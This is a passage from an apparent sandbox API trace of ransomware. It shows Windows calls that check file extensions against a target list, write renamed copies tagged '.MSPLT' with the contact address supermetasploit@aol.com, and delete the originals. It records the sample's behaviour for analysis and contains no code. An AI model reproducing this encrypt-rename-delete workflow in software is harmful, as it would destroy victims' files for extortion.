lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.372] SetEndOfFile (hFile=0x464) returned 1 [0296.377] CloseHandle (hObject=0x464) returned 1 [0296.377] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0296.378] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf")) returned 1 [0296.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0296.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0296.379] lstrlenW (lpString=".doc") returned 4 [0296.379] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.379] lstrlenW (lpString=".docx") returned 5 [0296.379] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.379] lstrlenW (lpString=".pdf") returned 4 [0296.379] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.379] lstrlenW (lpString=".xls") returned 4 [0296.379] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.379] lstrlenW (lpString=".xlsx") returned 5 [0296.379] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.379] lstrlenW (lpString=".ppt") returned 4 [0296.379] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0296.379] lstrlenW (lpString=".zip") returned 4 [0296.379] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.379] lstrlenW (lpString=".rar") returned 4 [0296.379] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.379] lstrlenW (lpString=".bz2") returned 4 [0296.379] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.379] lstrlenW (lpString=".7z") returned 3 [0296.379] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0296.379] lstrlenW (lpString=".dbf") returned 4 [0296.380] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0296.380] lstrlenW (lpString=".1cd") returned 4 [0296.380] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0296.380] lstrlenW (lpString=".jpg") returned 4 [0296.380] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0296.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0296.380] lstrlenW (lpString=".doc") returned 4 [0296.380] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.380] lstrlenW (lpString=".docx") returned 5 [0296.380] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.380] lstrlenW (lpString=".pdf") returned 4 [0296.380] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.380] lstrlenW (lpString=".xls") returned 4 [0296.380] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.380] lstrlenW (lpString=".xlsx") returned 5 [0296.380] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.380] lstrlenW (lpString=".ppt") returned 4 [0296.380] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0296.380] lstrlenW (lpString=".zip") returned 4 [0296.380] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.380] lstrlenW (lpString=".rar") returned 4 [0296.380] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.381] lstrlenW (lpString=".bz2") returned 4 [0296.381] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.381] lstrlenW (lpString=".7z") returned 3 [0296.381] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0296.381] lstrlenW (lpString=".dbf") returned 4 [0296.381] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0296.381] lstrlenW (lpString=".1cd") returned 4 [0296.381] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0296.381] lstrlenW (lpString=".jpg") returned 4 [0296.381] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.381] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0296.381] lstrlenW (lpString="BD07804_.WMF") returned 12 [0296.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0296.382] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=4924) returned 1 [0296.382] CloseHandle (hObject=0x464) returned 1 [0296.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf")) returned 0x220 [0296.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0296.383] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.383] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0296.386] GetLastError () returned 0x0 [0296.386] ReadFile (in: hFile=0x464, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x133c, lpOverlapped=0x0) returned 1 [0296.388] WriteFile (in: hFile=0x4c0, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x1340, lpOverlapped=0x0) returned 1 [0296.389] ReadFile (in: hFile=0x464, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0296.390] WriteFile (in: hFile=0x4c0, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0296.390] SetEndOfFile (hFile=0x4c0) returned 1 [0296.390] CloseHandle (hObject=0x4c0) returned 1 [0296.396] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.396] SetEndOfFile (hFile=0x464) returned 1 [0296.712] CloseHandle (hObject=0x464) returned 1 [0296.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0297.495] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf")) returned 1 [0297.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0297.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0297.496] lstrlenW (lpString=".doc") returned 4 [0297.496] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.496] lstrlenW (lpString=".docx") returned 5 [0297.496] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.496] lstrlenW (lpString=".pdf") returned 4 [0297.496] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.496] lstrlenW (lpString=".xls") returned 4 [0297.496] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.496] lstrlenW (lpString=".xlsx") returned 5 [0297.496] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.496] lstrlenW (lpString=".ppt") returned 4 [0297.496] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0297.497] lstrlenW (lpString=".zip") returned 4 [0297.497] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.497] lstrlenW (lpString=".rar") returned 4 [0297.497] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.497] lstrlenW (lpString=".bz2") returned 4 [0297.497] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.497] lstrlenW (lpString=".7z") returned 3 [0297.497] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0297.497] lstrlenW (lpString=".dbf") returned 4 [0297.497] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0297.497] lstrlenW (lpString=".1cd") returned 4 [0297.497] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0297.497] lstrlenW (lpString=".jpg") returned 4 [0297.497] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0297.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0297.497] lstrlenW (lpString=".doc") returned 4 [0297.497] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.497] lstrlenW (lpString=".docx") returned 5 [0297.497] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.497] lstrlenW (lpString=".pdf") returned 4 [0297.497] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.497] lstrlenW (lpString=".xls") returned 4 [0297.498] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.498] lstrlenW (lpString=".xlsx") returned 5 [0297.498] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.498] lstrlenW (lpString=".ppt") returned 4 [0297.498] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0297.498] lstrlenW (lpString=".zip") returned 4 [0297.498] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.498] lstrlenW (lpString=".rar") returned 4 [0297.498] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.498] lstrlenW (lpString=".bz2") returned 4 [0297.498] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.498] lstrlenW (lpString=".7z") returned 3 [0297.498] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0297.498] lstrlenW (lpString=".dbf") returned 4 [0297.498] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0297.498] lstrlenW (lpString=".1cd") returned 4 [0297.498] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0297.498] lstrlenW (lpString=".jpg") returned 4 [0297.498] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.499] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0297.499] lstrlenW (lpString="BD10972_.GIF") returned 12 [0297.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0297.500] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=20189) returned 1 [0297.500] CloseHandle (hObject=0x454) returned 1 [0297.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif")) returned 0x220 [0297.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0297.501] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0297.501] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0297.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0297.502] GetLastError () returned 0x0 [0297.502] ReadFile (in: hFile=0x454, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x4edd, lpOverlapped=0x0) returned 1 [0297.504] WriteFile (in: hFile=0x440, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x4ee0, lpOverlapped=0x0) returned 1 [0297.507] ReadFile (in: hFile=0x454, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0297.507] WriteFile (in: hFile=0x440, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0297.507] SetEndOfFile (hFile=0x440) returned 1 [0297.507] CloseHandle (hObject=0x440) returned 1 [0297.512] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0297.512] SetEndOfFile (hFile=0x454) returned 1 [0297.516] CloseHandle (hObject=0x454) returned 1 [0297.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0297.517] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif")) returned 1 [0297.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0297.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0297.518] lstrlenW (lpString=".doc") returned 4 [0297.518] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0297.518] lstrlenW (lpString=".docx") returned 5 [0297.518] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0297.518] lstrlenW (lpString=".pdf") returned 4 [0297.518] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0297.518] lstrlenW (lpString=".xls") returned 4 [0297.518] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0297.518] lstrlenW (lpString=".xlsx") returned 5 [0297.518] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0297.518] lstrlenW (lpString=".ppt") returned 4 [0297.518] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0297.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0297.519] lstrlenW (lpString=".zip") returned 4 [0297.519] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0297.519] lstrlenW (lpString=".rar") returned 4 [0297.519] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0297.519] lstrlenW (lpString=".bz2") returned 4 [0297.519] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0297.519] lstrlenW (lpString=".7z") returned 3 [0297.519] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0297.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0297.519] lstrlenW (lpString=".dbf") returned 4 [0297.519] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0297.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0297.519] lstrlenW (lpString=".1cd") returned 4 [0297.519] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0297.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0297.519] lstrlenW (lpString=".jpg") returned 4 [0297.519] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0297.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0297.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0297.519] lstrlenW (lpString=".doc") returned 4 [0297.519] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0297.519] lstrlenW (lpString=".docx") returned 5 [0297.519] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0297.519] lstrlenW (lpString=".pdf") returned 4 [0297.520] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0297.520] lstrlenW (lpString=".xls") returned 4 [0297.520] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0297.520] lstrlenW (lpString=".xlsx") returned 5 [0297.520] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0297.520] lstrlenW (lpString=".ppt") returned 4 [0297.520] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0297.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0297.520] lstrlenW (lpString=".zip") returned 4 [0297.520] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0297.520] lstrlenW (lpString=".rar") returned 4 [0297.520] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0297.520] lstrlenW (lpString=".bz2") returned 4 [0297.520] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0297.520] lstrlenW (lpString=".7z") returned 3 [0297.520] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0297.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0297.520] lstrlenW (lpString=".dbf") returned 4 [0297.520] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0297.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0297.520] lstrlenW (lpString=".1cd") returned 4 [0297.520] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0297.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0297.520] lstrlenW (lpString=".jpg") returned 4 [0297.520] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0297.521] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0297.521] lstrlenW (lpString="BD19563_.GIF") returned 12 [0297.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0297.522] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=20454) returned 1 [0297.522] CloseHandle (hObject=0x454) returned 1 [0297.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif")) returned 0x220 [0297.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0297.522] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0297.523] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0297.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0297.524] GetLastError () returned 0x0 [0297.524] ReadFile (in: hFile=0x454, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x4fe6, lpOverlapped=0x0) returned 1 [0297.527] WriteFile (in: hFile=0x440, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x4ff0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x4ff0, lpOverlapped=0x0) returned 1 [0297.532] ReadFile (in: hFile=0x454, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0297.532] WriteFile (in: hFile=0x440, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0297.532] SetEndOfFile (hFile=0x440) returned 1 [0297.532] CloseHandle (hObject=0x440) returned 1 [0297.534] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0297.534] SetEndOfFile (hFile=0x454) returned 1 [0298.237] CloseHandle (hObject=0x454) returned 1 [0298.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", 